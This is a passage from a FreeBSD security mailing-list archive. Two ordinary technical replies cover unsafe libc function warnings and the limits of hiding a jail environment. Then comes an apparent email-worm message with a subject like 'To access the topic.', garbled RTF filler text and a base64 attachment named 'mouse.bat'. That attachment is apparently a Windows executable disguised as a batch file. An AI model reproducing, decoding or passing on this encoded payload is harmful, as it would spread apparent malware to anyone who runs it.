* Buliwyf McGraw [020114 14:49] wrote:
>
> Hi... i was installing several applications (php,xmms,etc) on my
> FreeBSD 4.4 server and i got the next message a lot of times when
> i was compiling:
>
> /usr/lib/compat/libc.so.3: warning: mktemp() possibly used unsafely;
> consider using mkstemp()
> /usr/lib/compat/libc.so.3: warning: tmpnam() possibly used unsafely;
> consider using mkstemp()
> /usr/lib/compat/libc.so.3: warning: this program uses gets(), which is
> unsafe.
> /usr/lib/compat/libc.so.3: WARNING! setkey(3) not present in the system!
> /usr/lib/compat/libc.so.3: WARNING! des_setkey(3) not present in the
> system!
> /usr/lib/compat/libc.so.3: WARNING! encrypt(3) not present in the system!
> /usr/lib/compat/libc.so.3: WARNING! des_cipher(3) not present in the
> system!
> /usr/lib/compat/libc.so.3: warning: this program uses f_prealloc(), which
> is not recommended.
>
> I want to fix this... what i can do?
> Thanks for any help.

Read the manpages, use the "Safer" version of the functions.

--
-Alfred Perlstein [alfred@freebsd.org]
'Instead of asking why a piece of software is using "1970s technology,"
start asking why software is ignoring 30 years of accumulated wisdom.'
Tax deductible donations for FreeBSD: http://www.freebsdfoundation.org/

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Jan 14 20: 3:48 2002
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50])
    by hub.freebsd.org (Postfix) with ESMTP id 9889B37B41D
    for ; Mon, 14 Jan 2002 20:03:45 -0800 (PST)
Received: from fledge.watson.org (fledge.pr.watson.org [192.0.2.3])
    by fledge.watson.org (8.11.6/8.11.5) with SMTP id g0F43PD41594;
    Mon, 14 Jan 2002 23:03:26 -0500 (EST) (envelope-from robert@fledge.watson.org)
Date: Mon, 14 Jan 2002 23:03:25 -0500 (EST)
From: Robert Watson
X-Sender: robert@fledge.watson.org
To: "Ryan C. Creasey"
Cc: freebsd-security@FreeBSD.ORG
Subject: RE: jail and NFS
In-Reply-To: <000001c19d2d$a5dae5c0$2801a8c0@office.p11.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Mon, 14 Jan 2002, Ryan C. Creasey wrote:

> But there are too many little instances that I seem to overlook. Does
> anyone know of a project (freshmeat?) out there that does this?
> Or am I just unusual for wanting users to believe they're not in a jail?

The problem is that it would be almost impossible to hide all evidence of
the user being in a jail, due to the way in which jail is implemented. If
you have root in the jail, you can trivially tell simply by attempting
certain privileged operations, which are limited in jail. In fact,
configuring a /dev such that it didn't look like a jail, in practice,
would leave you with a system that wasn't in jail :-). Hiding this
requires a great deal of virtualization, and is probably better suited to
VMware-like solutions.

Hiding the nature of the host environment, on the other hand, is something
that is much easier to do. It would probably be worth adding another
policy tweak sysctl to hide mount information, which is something I've
seen a number of requests for. FreeBSD 5.0-CURRENT does a much better job
of limiting information leak into jail, btw, than 4.x-STABLE, due to a
reworking of the inter-process authorization.

Robert N M Watson             FreeBSD Core Team, TrustedBSD Project
robert@fledge.watson.org      NAI Labs, Safeport Network Services

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Jan 15 5:43:22 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mta1.snet.net (mta1.snet.net [204.60.203.70])
    by hub.freebsd.org (Postfix) with ESMTP id B536E37B405;
    Tue, 15 Jan 2002 05:38:56 -0800 (PST)
Received: from smtp.snet.net (247.6.252.64.snet.net [64.252.6.247])
    by mta1.snet.net (8.12.1/8.12.1/SNET-smtp-1.1/D-1.1/O-1.1) with SMTP id g0FDbLOZ009961;
    Tue, 15 Jan 2002 08:37:26 -0500 (EST)
Date: Tue, 15 Jan 2002 08:37:21 -0500 (EST)
Message-Id: <200201151337.g0FDbLOZ009961@mta1.snet.net>
From: Thomas O Mills
SUBJECT: To access the topic.
X-MSMail-Priority: Normal
X-Priority: 3
X-Mailer: Microsoft Outlook Express 4.72.3612.1700
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_00D1_016D2E25.CC2E2570"
Content-Transfer-Encoding: 7bit
To: undisclosed-recipients:;
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

This is a multi-part message in MIME format.

------=_NextPart_000_00D1_016D2E25.CC2E2570
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

A box containing the current topics will be displayed allowing \par
you to select one with a single left button mouse click. Once a topic \par
has been selected, the box will automatically close and the topic will \par
be displayed beside the arrow.\par
\par
\par
\par
\cf2\f1 QUERY TEXT BOX \cf0\f0\par
\par
A red arrow points at this box. This is where you enter a keyword or \par
phrase that specifies what you are searching for from the current \par
Internet service you previously selected.

------=_NextPart_000_00D1_016D2E25.CC2E2570
Content-Type: application/octet-stream; name="mouse.bat"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="mouse.bat"
xASF0nQYi84zwIvpi/rB6QLzq4vNg+ED86qF0nUtiw2Ed0AAVmoIUf/Ti9CF0nUboXx3QACFwHQS VugbAAAAg8QEhcB1nV9eXVvDX15di8Jbw5CQkJCQkJCQoYB3QACFwHQUi0wkBFH/0IPEBIXAdAa4 AQAAAMMzwMP/JViBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP////9aFEAAbxRAAHJ1bnRpbWUgZXJy b3IgAAANCgAAVExPU1MgZXJyb3INCgAAAFNJTkcgZXJyb3INCgAAAABET01BSU4gZXJyb3INCgAA UjYwMjgNCi0gdW5hYmxlIHRvIGluaXRpYWxpemUgaGVhcA0KAAAAAFI2MDI3DQotIG5vdCBlbm91 Z2ggc3BhY2UgZm9yIGxvd2lvIGluaXRpYWxpemF0aW9uDQoAAAAAUjYwMjYNCi0gbm90IGVub3Vn aCBzcGFjZSBmb3Igc3RkaW8gaW5pdGlhbGl6YXRpb24NCgAAAABSNjAyNQ0KLSBwdXJlIHZpcnR1 YWwgZnVuY3Rpb24gY2FsbA0KAAAAUjYwMjQNCi0gbm90IGVub3VnaCBzcGFjZSBmb3IgX29uZXhp dC9hdGV4aXQgdGFibGUNCgAAAABSNjAxOQ0KLSB1bmFibGUgdG8gb3BlbiBjb25zb2xlIGRldmlj ZQ0KAAAAAFI2MDE4DQotIHVuZXhwZWN0ZWQgaGVhcCBlcnJvcg0KAAAAAFI2MDE3DQotIHVuZXhw ZWN0ZWQgbXVsdGl0aHJlYWQgbG9jayBlcnJvcg0KAAAAAFI2MDE2DQotIG5vdCBlbm91Z2ggc3Bh Y2UgZm9yIHRocmVhZCBkYXRhDQoADQphYm5vcm1hbCBwcm9ncmFtIHRlcm1pbmF0aW9uDQoAAAAA UjYwMDkNCi0gbm90IGVub3VnaCBzcGFjZSBmb3IgZW52aXJvbm1lbnQNCgBSNjAwOA0KLSBub3Qg ZW5vdWdoIHNwYWNlIGZvciBhcmd1bWVudHMNCgAAAFI2MDAyDQotIGZsb2F0aW5nIHBvaW50IG5v dCBsb2FkZWQNCgAAAABNaWNyb3NvZnQgVmlzdWFsIEMrKyBSdW50aW1lIExpYnJhcnkAAAAACgoA AFJ1bnRpbWUgRXJyb3IhCgpQcm9ncmFtOiAAAAAuLi4APHByb2dyYW0gbmFtZSB1bmtub3duPgAA AAAAAAAAAABHZXRMYXN0QWN0aXZlUG9wdXAAAEdldEFjdGl2ZVdpbmRvdwBNZXNzYWdlQm94QQB1 c2VyMzIuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAC0vAAAgG0AAAgAAAAAAAAA6UEAAOlBAAAAAIAAgACAAIAAgACAAIAAgACAAKAAoACgA KAAoACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEgAEAAQABAAEAAQABAAEAAQ ABAAEAAQABAAEAAQABAAhACEAIQAhACEAIQAhACEAIQAhAAQABAAEAAQABAAEAAQAIEAgQCBAIEA gQCBAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAQABAAEAAQABAAEACC AIIAggCCAIIAggACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAEAAQABAA EAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAuAAAAAQAAAAAAAAAAAAAAAQIE CAAAAACkAwAAYIJ5giEAAAAAAAAApt8AAAAAAAChpQAAAAAAAIGf4PwAAAAAQH6A/AAAAACoAwAA waPaoyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIH+AAAAAAAAQP4AAAAAAAC1AwAAwaPaoyAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAIH+AAAAAAAAQf4AAAAAAAC2AwAAz6LkohoA5aLoolsAAAAAAAAA AAAAAAAAAAAAAIH+AAAAAAAAQH6h/gAAAABRBQAAUdpe2iAAX9pq2jIAAAAAAAAAAAAAAAAAAAAA AIHT2N7g+QAAMX6B/gAAAAAFAADACwAAAAAAAAAdAADABAAAAAAAAACWAADABAAAAAAAAACNAADA CAAAAAAAAACOAADACAAAAAAAAACPAADACAAAAAAAAACQAADACAAAAAAAAACRAADACAAAAAAAAACS AADACAAAAAAAAACTAADACAAAAAAAAAADAAAABwAAAAoAAACMAAAA/////wAKAAAAEAAAIAWTGQAA AAAAAAAAAAAAAAAAAAACAAAAcEJAAAgAAABEQkAACQAAABhCQAAKAAAA9EFAABAAAADIQUAAEQAA AJhBQAASAAAAdEFAABMAAABIQUAAGAAAABBBQAAZAAAA6EBAABoAAACwQEAAGwAAAHhAQAAcAAAA UEBAAHgAAABAQEAAeQAAADBAQAB6AAAAIEBAAPwAAAAcQEAA/wAAAAxAQACAVEAAgFRAAJhUQACY VEAA///////////wAAAA8QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 